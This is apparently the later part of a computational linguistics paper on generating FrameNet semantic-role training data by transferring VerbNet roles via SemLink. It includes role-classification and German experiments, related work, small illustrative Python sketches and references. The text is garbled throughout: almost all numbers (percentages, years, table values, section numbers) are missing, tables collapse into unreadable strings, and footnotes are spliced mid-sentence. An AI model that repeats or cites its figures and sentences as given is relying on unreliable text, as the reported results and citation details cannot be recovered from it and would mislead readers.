then, we map the verbnet semantic roles to framenet roles based on role-level links in semlink and the automatically created sense labels. step a: verbnet role label transfer. our precision-oriented deterministic rules build on the re- sults of linguistic pre-processing. our pre-processing pipeline performs lemmatization, pos tagging, named-entity-recognition and parsing with the stan- ford parser (de marneffe et al., ), as well as se- mantic tagging with wordnet semantic fields. step we used the components from dkpro core (eckart de castilho and gurevych, ). we used the most-frequent-sense disambiguation heuristic which works well for the coarse-grained semantic types given by the wordnet semantic fields. named-entity tags are also mapped provides framenet sense labels for the target verbs. dependency parsing annotates dependency graphs, linking a governor to its dependents within a sen- tence. governors and dependents are represented by the heads of the phrases they occur in. for ver- bal governors, the dependency graphs correspond to predicate argument structures with the governor be- ing the predicate and the dependents corresponding to the argument heads. our rules attach verbnet role labels to dependent heads of their verbal governors. we can then derive argument spans by expanding the dependent heads by their phrases. the semantic role inventory as given by verbnet is our label space y (|y |= ). rule-based role labeling can be seen as label transfer where a corpus instance uj is given by the dependent of a verbal governor and its sentential context, including all linguistic annotations. then ruj is compared to a prototypical attribute representation rxi of a semantic role, derived from linguistic knowledge. more specifically, we iterate over the collapsed dependencies annotated by the stanford parser and apply a hierarchically organized chain of rules to the dependents of all verbal governors. in this rule chain, location and time roles are assigned first, in case a dependent is a location or has the semantic field value time. then, the other roles are annotated. this is done based on the dependency type in com- bination with named entity tags or semantic fields, either of the dependent or the verbal governor or both. an example rule is: for the dependency nsubj, the role experiencer is annotated if the governor’s seman- tic field is perception or emotion, and the role agent otherwise. this way, i in our example i feelfeeling strangely sad and low-spirited today is annotated with the experiencer role. some rules also check the semantic field of the de- pendent, e.g., the dependency prep with triggers the annotation of the role instrument, if the dependent is neither a person nor a group. often, it is not possible to determine a single verbnet role based on the avail- able linguistic information ( rules assign one role, rules assign roles, and rules assign roles), e.g., the distinction between theme and co-theme to wordnet semantic fields. it took a computational linguist days to develop the rules, using a sample of the verbnet annotations on propbank from semlink as a development set. can not be made. in such cases, multiple roles are annotated, which are all considered in the subsequent step b. evaluated on a test sample of verbnet an- notations on propbank, the percentage of correctly annotated roles among all annotated roles is . % – instances labeled with multiple roles are considered correct if the set of roles contains the gold label. 
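the two-step procedure, rule-based verbnet role assignment followed by a semlink-based mapping to framenet roles, can be pictured with the sketch below. the rule chain is reduced to the examples mentioned above (location/time first, then nsubj and prep_with), and the data representation, the semlink table layout, and the concrete frame and role names are illustrative assumptions rather than the authors' implementation.

```python
def verbnet_roles(dep, governor, dependent):
    """step 2a (sketch): assign candidate verbnet roles to one dependent of a verbal
    governor, based on the dependency type plus named-entity and semantic-field cues.
    returns a set; more than one label means the rules could not fully disambiguate."""
    # location and time roles are assigned first
    if dependent.get("ne") == "LOCATION":
        return {"Location"}
    if dependent.get("field") == "time":
        return {"Time"}
    if dep == "nsubj":
        # experiencer for perception/emotion governors, agent otherwise
        if governor.get("field") in {"perception", "emotion"}:
            return {"Experiencer"}
        return {"Agent"}
    if dep == "prep_with":
        # instrument, unless the dependent denotes a person or a group
        if dependent.get("ne") != "PERSON" and dependent.get("field") != "group":
            return {"Instrument"}
    return set()  # no rule fired; the argument stays unlabeled (partial labeling)

def framenet_roles(vn_roles, frame, semlink):
    """step 2b (sketch): map candidate verbnet roles to framenet roles of the
    automatically assigned frame, using an assumed semlink-style lookup table."""
    mapped = set()
    for role in vn_roles:
        mapped |= semlink.get((frame, role), set())
    return mapped

# "i feel strangely sad ..." -> nsubj dependent "i" of the perception verb "feel"
semlink = {("Feeling", "Experiencer"): {"Experiencer"}}
vn = verbnet_roles("nsubj", {"field": "perception"}, {"ne": "O", "field": "person"})
print(vn, framenet_roles(vn, "Feeling", semlink))
```

when the semlink lookup yields several framenet roles (as for the interlocutor roles of the discussion frame mentioned below), the sketch simply returns the whole set, mirroring the ambiguous label sets that are kept for the -set corpus variants.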
the percentage of instances where a rule assigns at least one role was . %. step b: mapping verbnet roles to framenet roles. finally, the annotated verbnet roles are mapped to framenet roles using (i) the automati- cally annotated framenet sense and (ii) the semlink mapping of verbnet roles to framenet roles for this framenet sense (frame). the information on the framenet frame is crucial to constrain the one-to-many mapping of verbnet roles to fine-grained framenet roles. for example, the verbnet role agent is mapped to a large number of different framenet roles across all frames. while the semlink mapping allows unique framenet roles to be assigned in many cases, there are still a number of cases left where the rule-based approach annotates a set of framenet roles. examples are interlocutor and interlocutor for the discussion frame, or agent and cause for the cause harm frame. for the former the distinction between the roles is arbitrary, while for the latter further disambiguation may be desired. as the semlink mapping is not complete, our approach results in partially labeled data, i.e., a sentence may contain only a single predicate-role pair, even though other arguments of the predicate are present. our experiments show that we can train semantic role classifiers successfully on partially labeled data. we used the training set from das and smith ( ) (annotated with framenet roles) as a devel- opment set. evaluated on the test set from das and smith ( ), the percentage of correctly annotated roles among all annotated roles is . %. . creating the role-labeled corpus we use the two sense-labeled corpora was xl and was l as input for the automatic role label trans- fer, creating role-labeled corpora wasr xl and wasr l. we distinguish two variants of these cor- as in step a, instances labeled with a set of roles are considered correct if the set contains the gold label. instances roles senses r/s i/r wasr xl-uni , , . wasr l-uni , . wasr xl-set , , . wasr l-set , , . fnft? , , . . table : role statistics of automatically labeled corpora. pora, one that only contains those role instances with a unique role label, marked with the suffix -uni in table , and one that additionally includes sets of labels, marked with the suffix -set. for wasr xl, step a results in . million ar- guments labeled with verbnet roles. this number is reduced by % in step b as a result of the in- complete mapping between verbnet and framenet senses and roles in semlink. table shows that the resulting corpora contain , (wasr l-uni) and , (wasr xl-uni) uniquely assigned role instances for the verbs in our test sets, a lot compared to the , instances in fnft?, fnft filtered by the verbs in our four test sets. the counts are even higher for the corpora including sets of labels. due to the sparse labeling approach, our wasr cor- pora contain on average up to . roles per predicate, compared to an average of . roles per predicate in fnft?. this number rises to . when instances with sets of labels are added. . role classification experiments role classification system. we trained a supervised system for semantic role classification as a log-linear model per verb-frame using the features described in fürstenau and lapata ( ). note that we do not evaluate the task of argument identification. argument identification is performed by our rule-based verbnet role transfer and follows common syntactic heuristics based on dependency parsing. following zapirain et al. 
( ), we specifi- cally consider the subtask of role classification, as we focus on the quality of our data on the semantic level. in this context it is important that the features of our role classifier do not use span information: they include lemma and pos of the argument head, its governing word, and the words right and left of the ar- gument head, the position of the argument relative to the predicate, and the grammatical relation between the argument head and the predicate. pre-processing is the same as for vsd. training and test data. we compare our role classifier trained on wasr xl-(set/uni) and wasr l-(set/uni) to the one based on fnft-train. test datasets are the same as for vsd, see table . . srl results and analysis results on wasr corpora. we evaluate p, r, and f on all frame-verb combinations for which there is more than one role in our training data. training the system on wasr xl-set and wasr l-set include training instances with sets of role labels. therefore, sets of role labels are among the predicted labels. in the evaluation, we count the label sets as correct if they contain the gold label. as expected, wasr xl-set leads to higher preci- sion and recall than wasr xl-uni, resulting from the larger role coverage in the training set, and the lenient evaluation setting, see table . we skip the wasr l-* corpora in table , because the benefits of the strict filtering for the sense corpora do not carry over to the role-labeled corpora: scores are lower for wasr l-* on all test sets because of a smaller number of role-labeled instances in the wasr l-* corpora (see table ). comparison to fnft-train. table compares the results of wasr xl-* to the system trained on fnft-train. note that we emulated the lenient eval- uation setting for fnft-train by retrieving the label set sl in wasr xl-set for a label l predicted by the fnft-train system and counting l as correct if any of the labels in sl matches the gold label. we, however, did not find any difference to the regular evaluation; it appears that the labeling errors of the fnft-train-based system are different from the label sets resulting from our labeling method. the precision for wasr xl-uni matches the pre- cision for fnft-train for the semeval and fate test sets (the difference is not significant). this is remark- able considering that only partially labeled data are available for training. for wasr xl-set, the precision scores for se- meval and fate improve over the fnft-train system, significantly for fate. recall of the wasr corpora is significantly lower allover, as a result of the sparse, partial labeling and the lower role coverage of our automatically labeled corpora. fnft-test fate masc semeval p r f p r f p r f p r f wasr xl-uni . * . * . . . * . . * . * . . . * . wasr xl-set . * . * . . * . * . . * . * . . . * . fnft-train . . . . . . . . . . . . b-wasr xl-uni . * . * . . . * . . . * . . . * . u-wasr xl-uni . * . * . . . * . . * . * . . . * . table : role classification p, r, f ; * marks significant differences to the system trained on fnft-train. figure : role classification learning curves. comparative analysis. we compare the perfor- mance of our wasr xl-uni and the fnft-train based system on the intersection of the evaluated senses between both systems. precision of fnft- train is higher on the intersection, except for semeval, where it is similar. fnft-train evaluates on average two more roles per sense than the wasr. 
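relating back to the span-free feature set described above for the role classifier, a possible extraction routine is sketched below; the token representation and the function name are assumptions for illustration, not the actual feature extraction code.

```python
def role_features(tokens, head_idx, pred_idx, relation):
    """extract span-free role classification features for one argument head.

    tokens: list of (lemma, pos) pairs for the sentence (assumed representation)
    head_idx / pred_idx: indices of the argument head and of the predicate
    relation: grammatical relation between argument head and predicate
    """
    lemma, pos = tokens[head_idx]
    return {
        "head_lemma": lemma,
        "head_pos": pos,
        "left_word": tokens[head_idx - 1][0] if head_idx > 0 else "<s>",
        "right_word": tokens[head_idx + 1][0] if head_idx + 1 < len(tokens) else "</s>",
        "governor": tokens[pred_idx][0],
        "position": "before" if head_idx < pred_idx else "after",
        "relation": relation,
    }
```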
evaluat- ing only on the difference, the instances not con- tained in the intersection, we see that wasr xl-uni contributes some instances that are not covered by fnft-train. these constitute between % and % of the total evaluated instances, compared to % to % instances added by fnft-train. the precision of wasr xl-uni on the intersection for masc is high at . , compared to . for fnft-test (not shown in table ). these results indicate that our wasr xl-uni is complementary to fnft-train. combining training data. to give further evi- dence of the complementary nature of the automati- cally labeled corpus, we run experiments that com- bine wasr xl-uni with fnft-train. we again use the union of the datasets (u-wasr xl-uni) and back- ing off to wasr xl-uni when fnft-train does not provide enough roles for a sense (b-wasr xl-uni). table shows better results for the backoff cor- pus than for the union. recall is significantly higher compared to fnft-train, and precision values are not significantly lower except for fnft-test. this demonstrates that our automatically role-labeled cor- pora can supplement a manually labeled corpus and benefit the resulting system. wasr sampling. because our wasr corpora show a zipfian distribution of roles (there are a few roles with a very large number of instances), we ran- domly sample nine training sets from wasr xl with a different maximal number of training instances per role s such that s = · i for i ∈ { , , .., }, i.e., s ranges from to . fig. shows the learning curves for precision on wasr xl-*. it shows that distributional effects occur, i.e., that certain sample sizes s lead to higher precision for a test set than using the full corpus. the masc test set particularly benefits from the sampling: combining fnft-train with the best sample from the wasr xl-set corpus (sampling instances per role) results in the allover highest precision ( . ) and f ( . ). german experiments to show that our method generalizes to other lan- guages, we applied it to german data. we used the salsa corpus (burchardt et al., ) as a source of german data with framenet- like labels. as salsa does not provide additional lexical unit examples, we split the corpus into a train- ing set s-train that is also used for the extraction of seed patterns, a development set s-dev, and a test set s-test. the proportion of train, development and test instances is . , . , . ; data statistics are shown in table . the unlabeled corpus used is based on dewac sections - (baroni et al., ). vsd corpus and evaluation. the llr used to generate more than , seed patterns consists verbs senses roles inst(s) inst(r) s-test , , , s-dev , , , s-train , , , was-de (t= . ) - , - wasr-de-set , , wasr-de-uni , , table : german dataset statistics on verbs. of s-train and the german wiktionary based on the linking by hartmann and gurevych ( ). dewac is labeled based on those patterns, and the thresholds t and f are determined in a vsd task on s-dev using a subset of the corpus based on sections - . the threshold t= . together with a discriminat- ing filter of f= . result in the best precision, and t= . in the best f score. therefore, we perform extrinsic evaluation in a vsd task on s-test with was-de (t= . ) and on the combinations u-was-de (union with s-train) and b-was-de (backoff-variant). 
the results in table show that the performance of the was-de-based system is worse than the s- train-based one, but the backoff version reaches best scores allover, indicating that our was-de corpora are complementary to s-train. p r f was-de . * . * . b-was-de . . * . u-was-de . * . * . s-train . . . table : german vsd p, r, f ; * marks significant differ- ences to s-train. srl corpus and evaluation. we adapt the rule- based verbnet role-labeling to german dependencies from the mate-tools parser (seeker and kuhn, ), and perform steps a and b on was-de, resulting in wasr-de-set/uni (see table ). we train our role classification system on the cor- pora in order to evaluate them extrinsically. training on wasr-de-uni results in precision of . – better than for english, but still significantly lower than for the s-train system with . . recall is very low at . . this is due to the low role coverage of the wasr corpora shown in table . the evaluation shows that our approach can be ap- plied to german. for vsd, the automatically labeled data can be used to improve on using s-train alone; improvements in precision are not significant, which has several potential causes, e.g., the smaller set of llrs used for seed pattern extraction compared to english, and the smaller size of the resulting corpora. the smaller corpora also result in very low recall for the role classification. future work could be to extend the german dataset by adding additional resources to the llr, for in- stance germanet (hamp and feldweg, ). ex- tending the semlink mapping to frames unique to salsa should additionally contribute to an im- proved role coverage. related work relevant related work is research on (i) the automatic acquisition of sense-labeled data for verbs, (ii) the au- tomatic acquisition of role-labeled data for framenet srl, and (iii) approaches to framenet srl using lexical resources and llrs, including rule-based and knowledge-based approaches. automatic acquisition of sense-labeled data. most previous work on automatically sense-labeling corpora for wsd focussed on nouns and wordnet as a sense inventory, e.g., leacock et al. ( ), mi- halcea and moldovan ( ), martinez ( ), duan and yates ( ). in this section, we describe work that specifically considers verbs. besides the already introduced work by cholakov et al. ( ), which we extended by discriminating patterns and adapted to the framenet verb sense inventory, this includes work by kübler and zhekova ( ), who extract example sentences from several english dictionar- ies and various types of corpora, including web cor- pora. they use a lesk-like algorithm to annotate target words in the extracted sentences with word- net senses and use them as training data for wsd. they evaluate on an all-words task and do not find performance improvements when training on the au- tomatically labeled data alone or on a combination of automatically labeled and gold data. automatic acquisition of role-labeled data. pre- vious work in the automatic acquisition of role- labeled data uses annotation projection methods, i.e., aligning a role-annotated sentence to a new sentence on the syntactic level and transferring the role anno- tations to the aligned words. the goals of fürstenau and lapata ( )’s work are most similar to our work. they perform an- notation projection of framenet roles for english verbs. 
for this, they pair sentences in the british na- tional corpus with frame-annotated sentences, align their syntactic structures (including arguments), and project annotations to the new sentences. they simu- late a “low-resource” scenario that only provides few training instances (called seed sentences) by vary- ing the number of seed sentences and added labeled sentences. they use the automatically labeled data together with seed training data to train a supervised system and find improvements over self-training. a main difference to our approach is that fürstenau and lapata ( ) do not use external information from llrs or other lexical resources like wordnet. like our approach, their approach creates a sparse labeling by a) discarding sentences that do not align well to their seeds, and b) discarding candidate pairs for which not all roles could be mapped. this leads to a high-precision approach that does not allow par- tially labeled data. such an approach does have disad- vantages, e.g., a potentially lower domain variability of the corpus, since they only label sentences very similar to the seed sentences. repeating their exper- iments for german, fürstenau ( ) finds that the variety of the automatically annotated sentences de- creases when a larger expansion corpus is used. in our approach, the asp patterns generalize from the seed sentences (cf. section ), leading us to assume that our knowledge-based approach could be more generous with respect to such variability; we already successfully evaluated it on four datasets from vari- ous domains, but would like to further confirm our assumption in a direct comparison. another approach for training data generation for propbank-style semantic role labeling is described in woodsend and lapata ( ). using comparable corpora they extract rewrite rules to generate para- phrases of the original propbank sentences. they use a model trained on propbank as the seed corpus to filter out noise introduced by the rewrite rules. a model trained on the extended propbank corpus out- performs the state of the art system on the conll- dataset. recently, pavlick et al. ( ) pre- sented a similar method to expand the fnft corpus through automatic paraphrasing. noise was filtered out using crowdsourcing and the resulting frame- labeled corpus showed a lexical coverage three times as high as the original fnft. however, they did not evaluate the augmented corpus as training data for semantic role classification. framenet srl using lexical resources. simi- lar to our approach of automatically creating role- labeled data in section , there are other rule-based approaches to framenet srl that rely on framenet and other lexical resources (shi and mihalcea, ; shi and mihalcea, ). both describe a rule-based system for framenet srl that builds on the results of syntactic parsing for the rule-based assignment of semantic roles to syntactic constituents. the role as- signment uses rules induced from the framenet full- text corpus. these rules encode sentence-level fea- tures of syntactic realizations of frames; they are com- bined with word-level semantic features from word- net including the countability of nouns or attribute relations of an adjective indicating which nouns it can modify. since the coverage of the induced rules is low, they are complemented by default rules. the approach to srl introduced by litkowski ( ) uses a dictionary built from framenet fulltext annotations to recognize and assign semantic roles. 
their system first performs frame disambiguation and then tries to match syntactic constituents produced by a parser with syntactic patterns included the gen- erated dictionary. their system is evaluated on the semeval- task for linking events and their partici- pants in discourse. it shows very low recall, which is mainly due to the low coverage of their framenet dictionary with regard to syntactic patterns. our approach differs from previous rule-based ap- proaches to srl in that we do not use the rule-based system directly, but use it to create labeled training data for training a supervised system. this transduc- tive semi-supervised learning setup should be able to deal better with the noise introduced by the rule based system than the inductive rule-based approaches. the work by kshirsagar et al. ( ) uses lexi- cal resources to enhance framenet srl. they also use the framenet sense examples and semlink, but in a completely different manner. regarding the sense examples, they employ domain adaptation tech- niques to augment the feature space extracted from the framenet training set with features from the sense examples, thereby increasing role labeling f by % compared to the baseline system semafor. we use the framenet example sentences only indi- rectly: as seed sentences for the frame label transfer (cf. step ), they provide distant supervision for the automatic frame labeling. our approach is comple- mentary to the one by kshirsagar et al. ( ) who use the sense examples for role labeling. kshirsagar et al. ( ) only briefly report on their experiments using semlink. they used the transla- tion of propbank labels to framenet in the semlink corpus as additional training data, but found that this strategy hurt role labeling performance. they credit this to the low coverage and errors in semlink, which might be amplified by the use of a transitive linking (from propbank to framenet via verbnet). in this work, we successfully employ semlink: we use the verbnet-framenet (sense- and role-level) linking from semlink in our role label transfer approach (step ). the resulting automatically role-labeled training data improve role classification in combi- nation with the fn-train set (cf. section . ). we assume that the large-scale generation of training data smoothes over the noise resulting from errors in the semlink mapping. kshirsagar et al. ( ) additionally use features from propbank srl as guide features and exploit the framenet hierarchy to augment the feature space, a method complementary to our approach. their best results combine the use of example sentences and the framenet hierarchy for feature augmenta- tion. they only evaluate on the fnft-test set, as has become standard for framenet srl evaluation. our distantly supervised corpus might be useful for domain adaptation to other datasets, as our role clas- sification evaluation shows. according to our above analysis, our strategy is complementary to the approach by kshirsagar et al. ( ). it would be interesting to evaluate to what de- gree our automatically labeled corpus would benefit their system. relation to framenet srl in this section, we discuss the potential impact of our work to state-of-the-art framenet srl. our experimental setup evaluates frame disam- biguation and role classification separately, which is a somewhat artificial setup. we show that our automat- ically generated training data are of high quality and contribute to improved classification performance. 
this section motivates that the data can also be useful in a state-of-the-art srl setting. for a long time, the semafor system has been the state-of-the-art framenet srl system (das et al., ; das et al., ). recently, systems were intro- duced that use new ways of generating training fea- tures and neural-network based representation learn- ing strategies. we already introduced (kshirsagar et al., ). hermann et al. ( ) use distributed representations for frame disambiguation. others integrate features based on document-level context into a new open-source srl system framat++ (roth and lapata, ), or present an efficient dynamic program formalization for framenet role labeling (täckström et al., ). they all report improve- ments on semafor results for full framenet srl. hermann et al. ( ) report state-of-the-art re- sults for framenet frame disambiguation. their approach is based on distributed representations of frame instances and their arguments (embeddings) and performs frame disambiguation by mapping a new instance to the embedding space and assigning the closest frame label (conditioned on the the lemma for seen predicates). they report that they improve frame identification accuracy over semafor by % for ambiguous instances in the fnft-test set, up to . % accuracy. they also improve over the se- mafor system for full srl, reporting an f of . % compared to . % from das et al. ( ). our frame disambiguation results are not directly comparable to their results. we also evaluate on ambiguous instances, but only on verbal predicates, which are typically more polysemous than nouns and adjectives and more difficult to disambiguate. the currently best-performing framenet srl sys- tem is the one presented by fitzgerald et al. ( ). they present a multitask learning setup for semantic role labeling which they evaluate for propbank and framenet srl. the setup is based on a specifically designed neural network model that embeds input and output data in a shared, dense vector space. us- ing the frame identification model from hermann et al. ( ), their results significantly improve on the previous state-of-the-art for full framenet srl, reaching f of . % on fnft-test – but only when training the model jointly on framenet training data and propbank-labeled data in a multitask setup. fitzgerald et al. ( ) report that the perfor- mance of their system on framenet test data suffers from the small training set available – only training on framenet training data yields similar results to täckström et al. ( ). the joint training setup does not benefit propbank srl due to the small size of the framenet training set in comparison to the propbank data. this shows that additional training data for framenet, for instance our automatically labeled cor- pora, could also benefit a state-of-the-art system. an explicit evaluation of this assumption or comparison to this system is left to future work. based on the discussion above, and on the frame and role classification experiments evaluated on four test sets, we expect that the data we generate with our method are complementary to the standard framenet training data and can be used to enhance state-of-the- art srl systems. we leave empirical evaluation of this claim to future work. by publishing our auto- matically labeled corpora for research purposes, we support efforts by other researchers to analyze them and integrate them into their systems. 
discussion and outlook the evaluation shows our purely knowledge-based approach for automatic label transfer results in high- quality training data for english srl that is comple- mentary to the fnft corpus. for vsd, our data lead to similar precision to a standard supervised setup, but at higher recall. learn- ing curves indicate that with an even larger corpus we may be able to further improve precision. for role classification, the sparse labeling leads to a low role recall, but high precision is achieved for the cov- ered roles. one cause for the sparse labeling is the incomplete mapping between verbnet and framenet roles in semlink; in future work we would like to ex- tend the semlink mapping automatically to enhance the coverage of our method, and to disambiguate ambiguous labels to further increase precision. as a knowledge-based approach, our method is particularly well-suited for languages and domains for which role-labeled corpora are lacking, but llrs are available or can be created automatically. we therefore applied our approach to german data; the resulting sense-labeled corpus is complementary to the training data from salsa . the role classifica- tion evaluation should improve with a larger corpus. state-of-the-art srl systems still rely on super- vised training, even when advanced methods such as deep learning are used. in section , we discussed in detail how our method relates to and comple- ments the most recent developments in framenet srl. it would be interesting to evaluate the bene- fits that our automatically labeled data can add to an advanced srl system. we expect particularly strong benefits in the context of domain adaptation: currently, framenet srl systems are only evaluted on in-domain test data. our method can be adapted to other sense and role inventories covered by llrs (e.g., verbnet and prop- bank) and to related approaches to srl and semantic parsing (e.g., qa-srl (he et al., )); the latter requires a mapping of the role inventory to a suitable llr, for instance mapping the role labels in qa-srl to semlink. we would also like to evaluate our ap- proach in comparison to other methods for training data generation, for instance methods based on align- ments (fürstenau and lapata, ), or paraphrasing (woodsend and lapata, ). conclusion we presented a novel approach to automatically generate training data for framenet srl. it fol- lows the distant supervision paradigm and performs knowledge-based label transfer from rich external knowledge sources to large-scale corpora without relying on manually labeled corpora. by transferring labels to a large, diverse web- corpus (ukwac) the potential of our approach for generating data for different domains becomes appar- ent. by applying it to german data, we showed that our approach is applicable across languages. as a further result of our work, we publish the automati- cally labeled corpora and release our implementation for knowledge-based role labeling (cf. step a in section ) as open source software. automatic label transfer using linked resources has become popular in relation extraction (mintz et al., ) and has been applied to vsd (cholakov et al., ), but not to srl. in this work, we showed that knowledge-based label transfer from llrs to large-scale corpora offers great opportunities also for complex semantic tasks like srl. acknowledgments this work has been supported by the german re- search foundation under grant no. gu / - , grant no. gu / - , and grant no. grk / . 
we thank the action editors and anonymous review- ers for their thoughtful comments. additional thanks go to nancy ide and collin baker for providing the masc dataset. references marco baroni, silvia bernardini, adriano ferraresi, and eros zanchetta. . the wacky wide web: a collection of very large linguistically processed web- crawled corpora. language resources and evalua- tion, ( ): – . jonathan berant, vivek srikumar, pei-chun chen, abby vander linden, brittany harding, brad huang, peter clark, and christopher d. manning. . model- ing biological processes for reading comprehension. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar. claire bonial, kevin stowe, and martha palmer. . renewing and revising semlink. in proceedings of the nd workshop on linked data in linguistics (ldl- ): representing and linking lexicons, termi- nologies and other language data, pages – , pisa, italy. aljoscha burchardt and marco pennacchiotti. . fate: a framenet-annotated corpus for textual en- tailment. in proceedings of the sixth international conference on language resources and evaluation (lrec’ ), pages – , marrakech, morocco. aljoscha burchardt, kathrin erk, anette frank, andrea kowalski, sebastian padó, and manfred pinkal. . the salsa corpus: a german corpus resource for lexical semantics. in proceedings of the th interna- tional conference on language resources and evalua- tion (lrec ), pages – , genoa, italy. kostadin cholakov, judith eckle-kohler, and iryna gurevych. . automated verb sense labelling based on linked lexical resources. in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics (eacl ), pages – , gothenburg, sweden. dipanjan das and noah a. smith. . semi- supervised frame-semantic parsing for unknown pred- icates. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, pages – , portland, oregon, usa. dipanjan das, nathan schneider, desai chen, and noah a. smith. . probabilistic frame-semantic parsing. in human language technologies: the annual conference of the north american chapter of the asso- ciation for computational linguistics, pages – , los angeles, ca, usa. dipanjan das, desai chen, andré f. t. martins, nathan schneider, and noah a. smith. . frame-semantic parsing. computational linguistics, ( ): – . marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the th edition of the international con- ference on language resources and evaluation, pages – , genoa, italy. weisi duan and alexander yates. . extracting glosses to disambiguate word senses. in human lan- guage technologies: the annual conference of the north american chapter of the association for computational linguistics, hlt ’ , pages – , los angeles, ca, usa. richard eckart de castilho and iryna gurevych. . a broad-coverage collection of portable nlp com- ponents for building shareable analysis pipelines. in proceedings of the workshop on open infrastructures and analysis frameworks for hlt (oiaf hlt) at coling , pages – , dublin, ireland. associ- ation for computational linguistics and dublin city university. parvin sadat feizabadi and sebastian padó. . crowd- sourcing annotation of non-local semantic roles. 
in proceedings of the th conference of the european chapter of the association for computational linguis- tics, volume : short papers, pages – , gothen- burg, sweden. charles j. fillmore, . linguistics in the morning calm, chapter frame semantics, pages – . han- shin publishing company, seoul, south korea. nicholas fitzgerald, oscar täckström, kuzman ganchev, and dipanjan das. . semantic role labeling with neural network factors. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal. marco fossati, claudio giuliano, and sara tonelli. . outsourcing framenet to the crowd. in proceedings of the st annual meeting of the association for com- putational linguistics (volume : short papers), pages – , sofia, bulgaria. hagen fürstenau and mirella lapata. . semi- supervised semantic role labeling via structural alignment. computational linguistics, ( ): – . hagen fürstenau. . semi-supervised semantic role labeling via graph alignment, volume of saarbrücken dissertations in computational linguis- tics and language technology. german research cen- ter for artificial intelligence and saarland university, saarbrücken, germany. mark hall, eibe frank, geoffrey holmes, bernhard pfahringer, peter reutemann, and ian h. witten. . the weka data mining software: an update. sigkdd explorations, ( ): – . birgit hamp and helmut feldweg. . germanet - a lexical-semantic net for german. in proceedings of the acl workshop automatic information extraction and building of lexical semantic resources for nlp applications, pages – , madrid, spain. patrick hanks. . lexical analysis: norms and ex- ploitations. mit press, cambridge, ma, usa. silvana hartmann and iryna gurevych. . framenet on the way to babel: creating a bilingual framenet using wiktionary as interlingual connection. in pro- ceedings of the st annual meeting of the associa- tion for computational linguistics (acl ), pages – , sofia, bulgaria. kazi saidul hasan and vincent ng. . why are you taking this stance? identifying and classifying reasons in ideological debates. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar. luheng he, mike lewis, and luke zettlemoyer. . question-answer driven semantic role labeling: us- ing natural language to annotate natural language. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , lisbon, portugal. karl moritz hermann, dipanjan das, jason weston, and kuzman ganchev. . semantic frame identifica- tion with distributed word representations. in pro- ceedings of the nd annual meeting of the associa- tion for computational linguistics (volume : long papers), pages – , baltimore, maryland, usa. meghana kshirsagar, sam thomson, nathan schneider, jaime carbonell, noah a. smith, and chris dyer. . frame-semantic role labeling with heterogeneous annotations. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : short papers), pages – , beijing, china. sandra kübler and desislava zhekova. . semi- supervised learning for word sense disambiguation: quality vs. quantity. in proceedings of the inter- national conference ranlp- , pages – , borovets, bulgaria. claudia leacock, george a. miller, and martin chodorow. . using corpus statistics and wordnet relations for sense identification. computational linguistics, ( ): – . ken litkowski. . 
clr: linking events and their participants in discourse using a comprehen- sive framenet dictionary. in proceedings of the th international workshop on semantic evaluation (se- meval ’ ), pages – , los angeles, ca, usa. david martinez. . on the use of automatically acquired examples for all-nouns word sense disam- biguation. journal of artificial intelligence research, : – . rada mihalcea and dan moldovan. . an auto- matic method for generating sense tagged corpora. in proceedings of the american association for artifi- cial intelligence (aaai ), orlando, florida, usa. mike mintz, steven bills, rion snow, and daniel juraf- sky. . distant supervision for relation extraction without labeled data. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , suntec, singapore. rebecca j. passonneau, collin f. baker, christiane fell- baum, and nancy ide. . the masc word sense corpus. in proceedings of the eight international conference on language resources and evaluation (lrec’ ), pages – , istanbul, turkey. ellie pavlick, juri ganitkevitch, tsz ping chan, xuchen yao, benjamin van durme, and chris callison-burch. . domain-specific paraphrase extraction. in pro- ceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (vol- ume : short papers), pages – , beijing, china. octavian popescu, martha palmer, and patrick hanks. . mapping cpa patterns onto ontonotes senses. in proceedings of the ninth international conference on language resources and evaluation (lrec’ ), pages – , reykjavik, iceland. michael roth and mirella lapata. . context-aware frame-semantic role labeling. transactions of the association for computational linguistics, : – . josef ruppenhofer, caroline sporleder, roser morante, collin baker, and martha palmer. . semeval- task : linking events and their participants in discourse. in proceedings of the th international workshop on semantic evaluation, pages – , upp- sala, sweden. wolfgang seeker and jonas kuhn. . making ellipses explicit in dependency conversion for a german tree- bank. in nicoletta calzolari et al., editor, proceedings of the eight international conference on language re- sources and evaluation (lrec’ ), pages – , istanbul, turkey. lei shi and rada mihalcea. . open text semantic parsing using framenet and wordnet. in demon- stration papers at hlt-naacl , hlt-naacl– demonstrations ’ , pages – , stroudsburg, pa, usa. lei shi and rada mihalcea. . putting pieces to- gether: combining framenet, verbnet and wordnet for robust semantic parsing. in computational lin- guistics and intelligent text processing, pages – . springer berlin heidelberg. oscar täckström, kuzman ganchev, and dipanjan das. . efficient inference and structured learning for semantic role labeling. transactions of the associa- tion for computational linguistics, : – . kristian woodsend and mirella lapata. . text rewriting improves semantic role labeling. journal of artificial intelligence research, : – . david yarowsky. . unsupervised word sense dis- ambiguation rivaling supervised methods. in pro- ceedings of the rd annual meeting on association for computational linguistics, pages – , cambridge, massachusetts, usa. benat zapirain, eneko agirre, lluis marquez, and mi- hai surdeanu. . selectional preferences for se- mantic role classification. computational linguistics, ( ): – . 
